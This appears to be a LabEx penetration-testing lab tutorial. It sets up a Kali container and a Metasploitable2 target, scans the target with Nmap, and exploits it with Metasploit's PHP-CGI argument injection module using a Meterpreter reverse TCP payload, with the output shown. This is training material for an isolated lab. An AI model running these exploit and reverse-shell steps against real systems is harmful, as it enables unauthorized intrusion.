Introduction
In this lab, you will learn how to perform vulnerability scanning and penetration testing on a target machine using various tools in Kali Linux. The goal is to gain practical experience with popular vulnerability scanning tools and understand how to leverage the findings to conduct successful penetration attacks. The lab will be conducted on the LabEx platform, where you will be provided with a Kali Linux container as the attacking machine and a Metasploitable2 virtual machine as the target.
Setting up the Environment
In this step, you will start the Kali Linux container and the Metasploitable2 target machine on the LabEx platform.
- Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2
- Test the connectivity to the target machine by pinging it:
ping 192.168.122.102
Press Ctrl+C to stop the ping.
- Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
- Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102
Press Ctrl+C to stop the ping.
Performing Vulnerability Scanning with Nmap
In this step, you will learn about some popular vulnerability scanning tools available in Kali Linux.
X-scan: X-scan is a well-known comprehensive scanning tool in China. It is completely free, does not require installation, and supports both graphical and command-line interfaces in Chinese and English. X-scan is developed by a renowned Chinese hacker group called "Security Focus" and has been constantly improved since its internal testing version 0.2 in 2000.
Nessus: Nessus is one of the most widely used vulnerability scanning and analysis software in the world. Over 75,000 organizations use Nessus to scan their computer systems. Nessus was created by Renaud Deraison in 1998 with the goal of providing a free, powerful, frequently updated, and easy-to-use remote system security scanning program for the internet community.
SQLmap: SQLmap is an automatic SQL injection tool that can scan, detect, and exploit SQL injection vulnerabilities in a given URL. It currently supports MS-SQL, MySQL, Oracle, and PostgreSQL databases. SQLmap employs four unique SQL injection techniques: blind inference, UNION queries, stacked queries, and time-based blind injection.
Nmap: Nmap is a powerful and versatile network exploration and security auditing tool. It can be used for various purposes, including network discovery, port scanning, and vulnerability detection.
Now, you will use Nmap to perform a vulnerability scan on the Metasploitable2 target machine.
- Start the Metasploit database service and initialize the database:
cd ~
service postgresql start
msfdb init
- Launch the Metasploit console:
msfconsole
- Within the Metasploit console, use the
nmapcommand to scan the target machine:
nmap -sS -T4 192.168.122.102
Here's an example of the output you might see:
[*] exec: nmap -sS -T4 192.168.122.102
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 23:15 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0032s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
The -sS parameter performs a TCP SYN scan (also known as a half-open or stealth scan), and -T4 sets the timing policy to be aggressive but not too fast to avoid excessive network traffic.
- Observe the output of the scan, which should display the open ports and services on the target machine.
Press Ctrl+D to quit the Metasploit console then start the inspection
Exploiting a Vulnerability
In this step, you will use the information gathered from the Nmap scan to exploit a vulnerability on the Metasploitable2 target machine.
- First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
- From the Nmap scan results, identify an open port on the target machine, for example, port 80. In the Metasploit console, search for an exploit module related to the open port:
search http
- Use the appropriate exploit module:
use exploit/multi/http/php_cgi_arg_injection
- Set the target machine's IP address:
set RHOST 192.168.122.102
- Set the payload to use:
set PAYLOAD php/meterpreter/reverse_tcp
- Set the local machine's IP address:
set LHOST 192.168.122.1
- Run the exploit:
exploit
Here's an example of the output you might see:
[*] Started reverse TCP handler on 192.168.122.1:4444
[*] Sending stage (39927 bytes) to 192.168.122.102
[*] Meterpreter session 1 opened (192.168.122.1:4444 -> 192.168.122.102:38510) at 2024-03-23 23:21:14 +0000
If the exploit is successful, you should gain access to the target machine's shell. Verify the access by running commands like
sysinfoto display system information.If you have time, you can try exploring other vulnerability scanning tools like Nessus, SQLmap, or X-scan. You can also attempt to exploit different vulnerabilities on the Metasploitable2 target machine.
Press Ctrl+D to quit the Metasploit console then start the inspection
Summary
In this lab, you learned how to set up a Kali Linux environment for penetration testing and use popular vulnerability scanning tools like Nmap to identify potential vulnerabilities in a target system. You also gained hands-on experience in exploiting a vulnerability using the Metasploit Framework. This practical knowledge will help you understand the importance of vulnerability scanning and penetration testing in the field of cybersecurity.
🚀 Practice Now: Hands-on with Kali Vulnerability Scanning Tools
Want to Learn More?
- 🌳 Learn the latest Cybersecurity Skill Trees
- 📖 Read More Cybersecurity Tutorials
- 💬 Join our Discord or tweet us @WeAreLabEx
Top comments (0)